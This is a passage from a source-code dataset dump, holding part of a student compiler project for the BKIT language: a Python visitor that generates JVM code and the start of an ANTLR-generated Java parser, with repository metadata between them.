+ var_name, typ, a.frame)\r\n self.initStatic.append(init_code)\r\n return Symbol(var_name, typ, CName(self.className))\r\n else:\r\n init_code, typ = self.visit(ctx.varInit, o)\r\n # if len(dimen):\r\n # typ = ArrayType(typ, dimen)\r\n idx = o.frame.getNewIndex()\r\n start_label = o.frame.getStartLabel()\r\n end_label = o.frame.getEndLabel()\r\n self.emit.printout(self.emit.emitVAR(idx, var_name, typ, start_label, end_label, o.frame))\r\n init_code += self.emit.emitWRITEVAR(var_name, typ, idx, o.frame)\r\n self.initVar.append(init_code)\r\n # print('Index of {} in decl is {}'.format(var_name, idx))\r\n return Symbol(var_name, typ, Index(idx))\r\n else:\r\n # for param in functions\r\n idx = o.frame.getNewIndex()\r\n # self.emit.printout(self.emit.emitVAR(idx, var_name, typ, start_label, end_label, o.frame))\r\n if len(dimen):\r\n typ = ArrayType(None, dimen)\r\n else:\r\n typ = None\r\n return Symbol(var_name, typ, Index(idx))\r\n \r\n def visitFuncDecl(self,ctx:FuncDecl,o):\r\n frame = Frame(ctx.name.name, VoidType())\r\n subBody = SubBody(frame, o.symbol)\r\n frame.enterScope(True)\r\n begin_pos = self.emit.getBuffLen()\r\n partype = rettype = None\r\n for method in self.staticFunction:\r\n if method.name == ctx.name.name:\r\n # have invoked before its decl\r\n partype = method.mtype.partype\r\n rettype = method.mtype.rettype\r\n params = [self.visit(p, subBody) for p in ctx.param]\r\n if partype != None:\r\n params = list(map(lambda x, y: Symbol(x.name, y, x.value), params, partype))\r\n subBody.symbol = params + subBody.symbol\r\n # reduce(lambda e, decl: e.symbol + [self.visit(decl, e)], ctx.param, subBody)\r\n subBody.symbol = [self.visit(p, subBody) for p in ctx.body[0]] + subBody.symbol\r\n # reduce(lambda e, decl: e.symbol + [self.visit(decl, e)], ctx.body[0], subBody)\r\n self.emit.printout(self.emit.emitLABEL(frame.getStartLabel(), frame))\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n [self.visit(p, subBody) for p in 
ctx.body[1]]\r\n # after visit all stmt inside the body\r\n # there a trick to printout the method decl\r\n intype = []\r\n for name in [decl.variable.name for decl in ctx.param]:\r\n for sym in subBody.symbol:\r\n if sym.name == name:\r\n start_label = subBody.frame.getStartLabel()\r\n end_label = subBody.frame.getEndLabel()\r\n if type(sym.mtype) is ArrayType:\r\n if isinstance(sym.mtype.dimen, tuple):\r\n sym.mtype.dimen = sym.mtype.dimen[0]\r\n self.emit.printAt(self.emit.emitVAR(sym.value.value, name, sym.mtype, start_label, end_label, o.frame), self.emit.getBuffLen() - begin_pos)\r\n intype.append(sym.mtype)\r\n break\r\n typ = MType(intype, subBody.getRet())\r\n # for the Main function: it should be public static void main(String[] args)\r\n if ctx.name.name == 'main':\r\n start_label = subBody.frame.getStartLabel()\r\n end_label = subBody.frame.getEndLabel()\r\n self.emit.printAt(self.emit.emitVAR(frame.getNewIndex(), 'args', ArrayType(StringType(), [1]), start_label, end_label, o.frame), self.emit.getBuffLen() - begin_pos)\r\n typ = MType([ArrayType(StringType(), [1])], VoidType())\r\n print('come here')\r\n self.emit.printAt(self.emit.emitMETHOD(ctx.name.name, typ, True, o.frame), self.emit.getBuffLen() - begin_pos)\r\n self.emit.printout(self.emit.emitLABEL(frame.getEndLabel(), frame))\r\n # [self.emit.printout(code) for code in self.ret]\r\n # self.emit.printout(self.emit.emitRETURN(typ.rettype, frame))\r\n self.emit.printout(self.emit.emitENDMETHOD(frame))\r\n frame.exitScope()\r\n o.symbol += [Symbol(ctx.name.name, typ, CName(self.className))]\r\n\r\n def visitAssign(self,ctx:Assign,o):\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n rhs_code, r_type = self.visit(ctx.rhs, access)\r\n access.isLeft = True\r\n lhs_code, l_type = self.visit(ctx.lhs, access)\r\n # Infer the type of unknown\r\n if rhs_code == None:\r\n self.infer(ctx.rhs, l_type, access)\r\n access.isLeft = False\r\n rhs_code, r_type = self.visit(ctx.rhs, access)\r\n # 
print(rhs_code)\r\n if lhs_code == None:\r\n self.infer(ctx.lhs, r_type, access)\r\n access.isLeft = True\r\n lhs_code, l_type = self.visit(ctx.lhs, access)\r\n # We must have the correct type after infered (instead of None)\r\n lines = lhs_code.split('\\n')\r\n lines.insert(-2, rhs_code)\r\n self.emit.printout('\\n'.join(lines))\r\n\r\n def visitIf(self, ctx:If, o):\r\n labels = list(map(lambda x: o.frame.getNewLabel(), range(len(ctx.ifthenStmt) + 1)))\r\n for idx in range(len(ctx.ifthenStmt)):\r\n access = Access(o.frame, o.symbol, False)\r\n expr_code, typ = self.visit(ctx.ifthenStmt[idx][0], access)\r\n if typ == None:\r\n self.inferId(ctx.ifthenStmt[idx][0], BoolType(), access)\r\n expr_code, typ = self.visit(ctx.ifthenStmt[idx][0], access)\r\n l1 = labels[idx]\r\n l2 = labels[-1]\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitIFFALSE(l1, access.frame))\r\n access.symbol = [self.visit(decl, access) for decl in ctx.ifthenStmt[idx][1]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n [self.visit(stmt, access) for stmt in ctx.ifthenStmt[idx][2]]\r\n self.emit.printout(self.emit.emitGOTO(l2, access.frame))\r\n self.emit.printout(self.emit.emitLABEL(l1, access.frame))\r\n if ctx.elseStmt:\r\n access.symbol = [self.visit(decl, access) for decl in ctx.elseStmt[0]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n [self.visit(stmt, access) for stmt in ctx.elseStmt[1]]\r\n self.emit.printout(self.emit.emitLABEL(labels[-1], access.frame)) \r\n \r\n def visitWhile(self, ctx:While, o):\r\n access = Access(o.frame, o.symbol, False)\r\n o.frame.enterLoop()\r\n inL, outL = o.frame.getContinueLabel(), o.frame.getBreakLabel()\r\n self.emit.printout(self.emit.emitLABEL(inL, o.frame))\r\n # condition\r\n expr_code, typ = self.visit(ctx.exp, access)\r\n if expr_code == None:\r\n self.infer(ctx.exp, BoolType(), access)\r\n expr_code, typ = self.visit(ctx.exp, access)\r\n 
self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitIFFALSE(outL, access.frame))\r\n # declaration\r\n access.symbol = [self.visit(decl, access) for decl in ctx.sl[0]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n # enter loop\r\n [self.visit(stmt, access) for stmt in ctx.sl[1]]\r\n self.emit.printout(self.emit.emitGOTO(inL, access.frame))\r\n self.emit.printout(self.emit.emitLABEL(outL, access.frame))\r\n o.frame.exitLoop()\r\n \r\n def visitFor(self, ctx:For, o):\r\n o.frame.enterLoop()\r\n inL, outL = o.frame.getContinueLabel(), o.frame.getBreakLabel()\r\n o_ = Access(o.frame, o.symbol, False)\r\n # init\r\n expr1_code, _ = self.visit(ctx.expr1, o_)\r\n if expr1_code == None:\r\n self.infer(ctx.expr1, IntType(), o_)\r\n expr1_code, _ = self.visit(ctx.expr1, o_)\r\n o_.isLeft = True\r\n idx1_code, _ = self.visit(ctx.idx1, o_)\r\n o_.isLeft = False\r\n expr2_code, _ = self.visit(ctx.expr2, o_)\r\n if expr2_code == None:\r\n self.infer(ctx.expr2, IntType(), o_)\r\n expr1_code, _ = self.visit(ctx.expr2, o_)\r\n expr3_code, _ = self.visit(ctx.expr3, o_)\r\n if expr3_code == None:\r\n self.infer(ctx.expr3, IntType(), o_)\r\n expr1_code, _ = self.visit(ctx.expr3, o_)\r\n # decl\r\n [self.visit(decl, o_) for decl in ctx.loop[0]]\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n self.emit.printout(self.emit.emitLABEL(inL, o.frame))\r\n # condition\r\n self.emit.printout(expr2_code)\r\n self.emit.printout(self.emit.emitIFFALSE(outL, o.frame))\r\n # loop stmt\r\n [self.visit(stmt, o_) for stmt in ctx.loop[1]]\r\n # update\r\n o_.isLeft = False\r\n idx1_code_load, _ = self.visit(ctx.idx1, o_)\r\n self.emit.printout(idx1_code_load)\r\n self.emit.printout(expr3_code)\r\n self.emit.printout(self.emit.emitADDOP('+', IntType(), o_.frame))\r\n self.emit.printout(idx1_code)\r\n self.emit.printout(self.emit.emitGOTO(inL, o.frame))\r\n self.emit.printout(self.emit.emitLABEL(outL, o.frame))\r\n 
o.frame.exitLoop()\r\n\r\n def visitBreak(self, ctx:Break, o):\r\n outL = o.frame.getBreakLabel()\r\n self.emit.printout(self.emit.emitGOTO(outL, o.frame))\r\n \r\n def visitContinue(self, ctx:Continue, o):\r\n inL = o.frame.getContinueLabel()\r\n self.emit.printout(self.emit.emitGOTO(inL, o.frame))\r\n \r\n def visitReturn(self, ctx:Return, o):\r\n a = Access(o.frame, o.symbol, isLeft=False)\r\n typ = VoidType()\r\n if ctx.expr:\r\n expr_code, typ = self.visit(ctx.expr, a)\r\n self.ret.append(expr_code)\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitRETURN(typ, a.frame))\r\n o.setRet(typ)\r\n \r\n def visitDowhile(self, ctx:Dowhile, o):\r\n access = Access(o.frame, o.symbol, False)\r\n expr_code, _ = self.visit(ctx.exp, access)\r\n if expr_code == None:\r\n self.infer(ctx.expr, BoolType(), access)\r\n expr_code, _ = self.visit(ctx.exp, access)\r\n o.frame.enterLoop()\r\n inL, outL = o.frame.getContinueLabel(), o.frame.getBreakLabel()\r\n # declaration\r\n access.symbol = [self.visit(decl, access) for decl in ctx.sl[0]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n # enter loop\r\n self.emit.printout(self.emit.emitLABEL(inL, o.frame))\r\n [self.visit(stmt, access) for stmt in ctx.sl[1]]\r\n # condition\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitIFFALSE(outL, o.frame))\r\n self.emit.printout(self.emit.emitGOTO(inL, o.frame))\r\n self.emit.printout(self.emit.emitLABEL(outL, o.frame))\r\n o.frame.exitLoop()\r\n \r\n def visitCallStmt(self, ctx:CallStmt, o):\r\n method_sym = None\r\n for sym in o.symbol:\r\n if sym.name == ctx.method.name:\r\n method_sym = sym\r\n break\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n expr_codes = []\r\n if method_sym != None:\r\n # infer the args in case the function has been inferred\r\n # print(list(map(lambda x,y: (x,y), ctx.param, method_sym.mtype.partype)))\r\n for (expr, expect) in list(map(lambda x,y: (x,y), ctx.param, 
method_sym.mtype.partype)):\r\n expr_code, typ = self.visit(expr, access)\r\n if expr_code == None:\r\n self.infer(expr, expect, access)\r\n expr_code, typ = self.visit(expr, access)\r\n expr_codes.append([expr_code, typ])\r\n else:\r\n name = ctx.method.name\r\n partype = [None]*len(ctx.param)\r\n rettype = VoidType()\r\n typ = MType(partype, rettype)\r\n self.staticFunction.append(Symbol(name, typ, CName(self.className)))\r\n method_sym = self.staticFunction[-1]\r\n expr_codes = [self.visit(expr, access) for expr in ctx.param]\r\n [self.emit.printout(code) for code in [ret[0] for ret in expr_codes]]\r\n typ = None\r\n className = self.className\r\n if method_sym == None:\r\n typ = MType([ret[1] for ret in expr_codes], VoidType())\r\n self.staticFunction.append(Symbol(ctx.method.name, typ, CName(self.className)))\r\n else:\r\n typ = method_sym.mtype\r\n className = method_sym.value.value\r\n self.emit.printout(self.emit.emitINVOKESTATIC(className +\".\"+ctx.method.name, typ, o.frame))\r\n \r\n def visitCallExpr(self, ctx:CallExpr, o):\r\n method_sym = None\r\n for sym in o.symbol:\r\n if sym.name == ctx.method.name:\r\n method_sym = sym\r\n break\r\n # Not yet go through\r\n if method_sym == None:\r\n for method in self.staticFunction:\r\n if method.name == ctx.method.name:\r\n method_sym = method\r\n break\r\n if method_sym == None:\r\n o.frame.push()\r\n return None, None\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n expr_codes = []\r\n if method_sym != None:\r\n if any([p == None for p in method_sym.mtype.partype]):\r\n # print('come here: ', method_sym.mtype.rettype)\r\n return None, None\r\n partype = method_sym.mtype.partype\r\n # infer the args in case the function has been inferred\r\n # print(list(map(lambda x,y: (x,y), ctx.param, method_sym.mtype.partype)))\r\n for (idx, p) in enumerate(ctx.param):\r\n code, typ = self.visit(p, access)\r\n if code == None:\r\n if partype[idx] == None:\r\n partype[idx] = IntType()\r\n self.infer(p, 
partype[idx], access)\r\n code, typ =self.visit(p, access)\r\n partype[idx] = typ\r\n expr_codes.append((code,typ))\r\n else:\r\n expr_codes = [self.visit(expr, access) for expr in ctx.param]\r\n code = \"\"\r\n if len(expr_codes) > 1:\r\n code = reduce(lambda x,y: x + y, [ret[0] for ret in expr_codes], \"\")\r\n elif len(expr_codes) == 1:\r\n code = expr_codes[0][0]\r\n print('the code: ', code)\r\n typ = method_sym.mtype\r\n className = method_sym.value.value\r\n # print('name of sym: {} and name of method: {}'.format(3method_sym.name, ctx.method.name))\r\n code += self.emit.emitINVOKESTATIC(className +\".\"+ctx.method.name, typ, o.frame)\r\n return code, method_sym.mtype.rettype\r\n \r\n \"\"\"\r\n ! I dont know if we can use emitREADVAR for this\r\n TODOs: try some experiences\r\n \"\"\"\r\n def visitArrayCell(self, ctx, o):\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n code, typ = self.visit(ctx.arr, access)\r\n if typ.eleType == None:\r\n return None, typ.eleType\r\n idxs_code = [self.visit(expr, access)[0] for expr in ctx.idx]\r\n for idx_code in idxs_code[:-1]:\r\n code += idx_code + self.emit.emitALOAD(ArrayType(typ, [1]), o.frame)\r\n if o.isLeft:\r\n code += idxs_code[-1] + self.emit.emitASTORE(typ.eleType, o.frame)\r\n else:\r\n code += idxs_code[-1] + self.emit.emitALOAD(typ.eleType, o.frame)\r\n return code, typ.eleType\r\n \r\n def visitUnaryOp(self, ctx, o):\r\n expr, typ = self.visit(ctx.body, o)\r\n if expr == None:\r\n self.infer(ctx.body, BoolType(), o)\r\n expr, typ = self.visit(ctx.body, o)\r\n if ctx.op in ['!']:\r\n code = expr + self.emit.emitNOT(BoolType(), o.frame)\r\n return code, BoolType()\r\n elif ctx.op in ['-', '-.']:\r\n code = expr + self.emit.emitNEGOP(typ, o.frame)\r\n return code, typ\r\n \r\n def visitBinaryOp(self, ctx, o):\r\n l, ltyp = self.visit(ctx.left, o)\r\n r, rtyp = self.visit(ctx.right, o)\r\n if ltyp == None:\r\n if ctx.op in ['+', '-', '*', '\\\\', '%', '==', '!=', '<', '>', '<=', '>=']:\r\n 
self.infer(ctx.left, IntType(), o)\r\n elif ctx.op in ['||', '&&']:\r\n self.infer(ctx.left, BoolType(), o)\r\n else:\r\n self.infer(ctx.left, FloatType(), o)\r\n l, ltyp = self.visit(ctx.left, o)\r\n elif rtyp == None:\r\n if ctx.op in ['+', '-', '*', '\\\\', '%', '==', '!=', '<', '>', '<=', '>=']:\r\n self.infer(ctx.right, IntType(), o)\r\n elif ctx.op in ['||', '&&']:\r\n self.infer(ctx.right, BoolType(), o)\r\n else:\r\n self.infer(ctx.right, FloatType(), o)\r\n r, rtyp = self.visit(ctx.right, o)\r\n typ = ltyp\r\n code, rettyp = None, None\r\n\r\n if ctx.op in ['+', '-', '+.', '-.']:\r\n if ctx.op in ['+', '+.']:\r\n code = l + r + self.emit.emitADDOP('+', typ, o.frame)\r\n rettyp = typ\r\n else:\r\n code = l + r + self.emit.emitADDOP('-', typ, o.frame)\r\n rettyp = typ\r\n elif ctx.op in ['*', '*.', '\\\\', '\\\\.', '%']:\r\n if ctx.op in ['*', '*.']:\r\n code = l + r + self.emit.emitMULOP('*', typ, o.frame)\r\n rettyp = typ\r\n elif ctx.op in ['\\\\', '\\\\.']:\r\n code = l + r + self.emit.emitMULOP('\\\\', typ, o.frame)\r\n rettyp = typ\r\n else:\r\n code = l + r + self.emit.emitMOD(o.frame)\r\n rettyp = typ\r\n elif ctx.op in ['&&', '||']:\r\n if ctx.op in ['&&']:\r\n code = l + r + self.emit.emitANDOP(o.frame)\r\n rettyp = BoolType()\r\n else:\r\n code = l + r + self.emit.emitOROP(o.frame)\r\n rettyp = BoolType()\r\n elif ctx.op in ['==', '!=', '<', '>', '<=', '>=', '=/=', '<.', '>.', '<=.', '>=.']:\r\n if ctx.op in ['==']:\r\n code = l + r + self.emit.emitREOP('==', typ, o.frame)\r\n elif ctx.op in ['!=', '=/=']:\r\n code = l + r + self.emit.emitREOP('!=', typ, o.frame)\r\n elif ctx.op in ['<', '<.']:\r\n code = l + r + self.emit.emitREOP('<', typ, o.frame)\r\n elif ctx.op in ['>', '>.']:\r\n code = l + r + self.emit.emitREOP('>', typ, o.frame)\r\n elif ctx.op in ['<=', '<=.']:\r\n code = l + r + self.emit.emitREOP('<=', typ, o.frame)\r\n elif ctx.op in ['>=', '>=.']:\r\n code = l + r + self.emit.emitREOP('>=', typ, o.frame)\r\n rettyp = BoolType()\r\n 
return code, rettyp\r\n \r\n def visitIntLiteral(self, ctx, o):\r\n code = self.emit.emitPUSHICONST(ctx.value, o.frame)\r\n return code, IntType()\r\n def visitFloatLiteral(self,ctx,o):\r\n code = self.emit.emitPUSHFCONST(str(ctx.value), o.frame)\r\n return code, FloatType()\r\n def visitStringLiteral(self, ctx, o):\r\n code = self.emit.emitPUSHCONST('\"' + ctx.value + '\"', StringType(), o.frame)\r\n return code, StringType()\r\n def visitBooleanLiteral(self, ctx, o):\r\n code = self.emit.emitPUSHICONST(str(ctx.value).lower(), o.frame)\r\n return code, BoolType()\r\n def visitArrayLiteral(self, ctx, o):\r\n access = o\r\n # lit_code = list(map(lambda x: self.visit(x, access), ctx.value))\r\n # lit_code = [ret[0] for ret in lit_code]\r\n # lit_code = list(map(lambda code, idx: self.emit.emitDUP(access.frame) + \\\r\n # self.emit.emitPUSHICONST(idx, access.frame) + code + \\\r\n # self.emit.emitASTORE(ele_type, access.frame), lit_code, range(len(lit_code))))\r\n init_code = \"\"\r\n ele_type = None\r\n for (idx, lit) in enumerate(ctx.value):\r\n init_code += self.emit.emitDUP(access.frame)\r\n init_code += self.emit.emitPUSHICONST(idx, access.frame)\r\n code, ele_type = self.visit(lit, access)\r\n init_code += code\r\n init_code += self.emit.emitASTORE(ele_type, access.frame)\r\n access.frame.maxOpStackSize += 1\r\n code = self.emit.emitANEWARRAY(ele_type, len(ctx.value), access.frame)\r\n code = code + init_code\r\n if isinstance(ele_type, ArrayType):\r\n # print(ele_type.dimen)\r\n if isinstance(ele_type.dimen, tuple):\r\n ele_type.dimen = ele_type.dimen[0]\r\n ele_type.dimen = [len(ctx.value)] + ele_type.dimen\r\n else:\r\n ele_type = ArrayType(ele_type, [len(ctx.value)])\r\n return code, ele_type\r\n def visitId(self, ctx, o):\r\n id_sym = None\r\n for _sym in o.symbol:\r\n if _sym.name == ctx.name:\r\n id_sym = _sym\r\n break\r\n if id_sym.mtype == None:\r\n return None, id_sym.mtype\r\n elif isinstance(id_sym.mtype, ArrayType) and id_sym.mtype.eleType == 
None:\r\n return None, id_sym.mtype\r\n # print('name: {}, mtype: {}, index: {}'.format(id_sym.name, id_sym.mtype, id_sym.value.value))\r\n if o.isLeft:\r\n if isinstance(id_sym.value, Index):\r\n # print('name: {}, mtype: {}, index: {}'.format(id_sym.name, id_sym.mtype, id_sym.value.value))\r\n code = self.emit.emitWRITEVAR(id_sym.name, id_sym.mtype, id_sym.value.value, o.frame)\r\n return code, id_sym.mtype\r\n else:\r\n code = self.emit.emitPUTSTATIC(id_sym.value.value + '.' + ctx.name, id_sym.mtype, o.frame)\r\n return code, id_sym.mtype\r\n else:\r\n if isinstance(id_sym.value, Index):\r\n code = self.emit.emitREADVAR(id_sym.name, id_sym.mtype, id_sym.value.value, o.frame)\r\n return code, id_sym.mtype\r\n else:\r\n code = self.emit.emitGETSTATIC(id_sym.value.value + '.' + ctx.name, id_sym.mtype, o.frame)\r\n return code, id_sym.mtype\r\n\r\n \r\n def inferId(self, id, expect_type, o):\r\n for sym in o.symbol:\r\n if id.name == sym.name:\r\n if sym.mtype == None:\r\n sym.mtype = expect_type\r\n if isinstance(sym.mtype, ArrayType):\r\n if sym.mtype.eleType == None:\r\n return None, sym.mtype\r\n break\r\n \r\n def inferArray(self, arr, expect_type, o):\r\n access = Access(o.frame, o.symbol, isLeft=o.isLeft)\r\n code, typ = self.visit(arr.arr, access)\r\n if typ.eleType == None:\r\n typ.eleType = expect_type\r\n ele_type = typ.eleType\r\n code, typ = self.visit(arr.arr, access)\r\n lit = None\r\n dimen = typ.dimen[0]\r\n if isinstance(typ.eleType, IntType):\r\n lit = ArrayLiteral([IntLiteral(0)]*dimen[-1])\r\n elif isinstance(typ.eleType, BoolType):\r\n lit = ArrayLiteral([BooleanLiteral(False)]*dimen[-1])\r\n elif isinstance(typ.eleType, StringType):\r\n lit = ArrayLiteral([StringLiteral(\"\")]*dimen[-1])\r\n elif isinstance(typ.eleType, FloatType):\r\n lit = ArrayLiteral([FloatType(0.0)]*dimen[-1])\r\n for d in dimen[::-1][1:]:\r\n lit = ArrayLiteral([lit]*d)\r\n lit_code, _ = self.visitArrayLiteral(lit, access)\r\n code = lit_code + code\r\n 
self.emit.printout(code)\r\n \r\n def inferCallExpr(self, callee, expect_type, o):\r\n # args_and_types = [self.visit(p,o) for p in callee.param]\r\n name = callee.method.name\r\n method_sym = None\r\n for method in self.staticFunction:\r\n if method.name == name:\r\n method_sym = method\r\n break\r\n if method_sym == None:\r\n partype = [None]*len(callee.param)\r\n rettype = expect_type\r\n typ = MType(partype, rettype)\r\n self.staticFunction.append(Symbol(name, typ, CName(self.className)))\r\n method_sym = self.staticFunction[-1]\r\n partype = method_sym.mtype.partype\r\n \"\"\"\r\n TODOs: infer the function that be invokeed before declared\r\n e.g.: foo(foo(x))\r\n \"\"\"\r\n args_and_types = []\r\n access = o\r\n for (idx, p) in enumerate(callee.param):\r\n code, typ = self.visit(p, access)\r\n if code == None:\r\n if partype[idx] == None:\r\n partype[idx] = IntType()\r\n self.infer(p, partype[idx], access)\r\n code, typ = self.visit(p, access)\r\n partype[idx] = typ\r\n # access = o\r\n # for p in callee.param:\r\n # code, typ = self.visit(p, access)\r\n # if code == None:\r\n # code, typ = self.infer(p, access)\r\n # for (expr, expect) in list(map(lambda x,y: (x,y), callee.param, method_sym.mtype.partype)):\r\n # expr_code, typ = self.visit(expr, access)\r\n # if expr_code == None:\r\n # self.infer(expr, expect, access)\r\n # expr_code, typ = self.visit(expr, access)\r\n # expr_codes.append([expr_code, typ])\r\n\r\n def infer(self, x, expect_type, o):\r\n if isinstance(x, Id):\r\n self.inferId(x, expect_type, o)\r\n return None\r\n elif isinstance(x, ArrayCell):\r\n self.inferArray(x, expect_type, o)\r\n return None\r\n elif isinstance(x, CallExpr):\r\n return self.inferCallExpr(x, expect_type, o)" }, { "alpha_fraction": 0.6155486106872559, "alphanum_fraction": 0.6485156416893005, "avg_line_length": 35.957576751708984, "blob_id": "f28fc1f21571d334de12323b1bccbb5d12f82f4b", "content_id": "4fc95ecb062be26a9aa62ff094da0785f4c14bb5", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6097, "license_type": "no_license", "max_line_length": 97, "num_lines": 165, "path": "/LexicalAnalysis/BKITParser.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.misc.*;\nimport org.antlr.v4.runtime.tree.*;\nimport java.util.List;\nimport java.util.Iterator;\nimport java.util.ArrayList;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class BKITParser extends Parser {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tREAL_NUMBER=1, ID=2, ILLEGAL_ESCAPE=3, UNCLOSE_STRING=4, COMMENT=5, UNTERMINATED_COMMENT=6, \n\t\tERROR_CHAR=7, WS=8, Integer_literal=9, Float_literal=10, Boolean_literal=11, \n\t\tString_literal=12, BODY=13, BREAK=14, CONTINUE=15, DO=16, ELSE=17, ELSELF=18, \n\t\tELSEIF=19, ENDBODY=20, ENDFOR=21, ENDWHILE=22, FOR=23, FUNCTION=24, IF=25, \n\t\tPARAMETER=26, RETURN=27, THEN=28, VAR=29, WHILE=30, TRUE=31, FALSE=32, \n\t\tENDDO=33, PLUS_INT=34, PLUS_FLOAT=35, MINUS_INT=36, MINUS_FLOAT=37, STAR_INT=38, \n\t\tSTAR_FLOAT=39, DIV_INT=40, DIV_FLOAT=41, MOD=42, NOT=43, AND=44, OR=45, \n\t\tEQUAL=46, NOT_EQUAL_INT=47, LESS_INT=48, GREATER_INT=49, LESS_OR_EQUAL_INT=50, \n\t\tGREATER_OR_EQUAL_INT=51, NOT_EQUAL_FLOAT=52, LESS_FLOAT=53, GREATER_FLOAT=54, \n\t\tLESS_OR_EQUAL_FLOAT=55, GREATER_OR_EQUAL_FLOAT=56, LEFT_PAREN=57, RIGHT_PARENT=58, \n\t\tLEFT_BRACKET=59, RIGHT_BRACKET=60, LEFT_BRACE=61, RIGHT_BRACE=62, COLON=63, \n\t\tDOT=64, SEMI=65, COMMA=66;\n\tpublic static final int\n\t\tRULE_program = 0;\n\tprivate static String[] 
makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"program\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, null, null, null, null, null, null, null, null, null, null, \n\t\t\tnull, \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n\t\t\t\"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n\t\t\t\"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n\t\t\t\"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \n\t\t\t\"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \n\t\t\t\"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \n\t\t\t\"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n\t\t\t\"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n\t\t\t\"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \n\t\t\t\"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \n\t\t\t\"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n\t\t\t\"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n\t\t\t\"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n\t\t\t\"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n\t\t\t\"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", 
\n\t\t\t\"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \n\t\t\t\"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \n\t\t\t\"COMMA\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"BKIT.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; 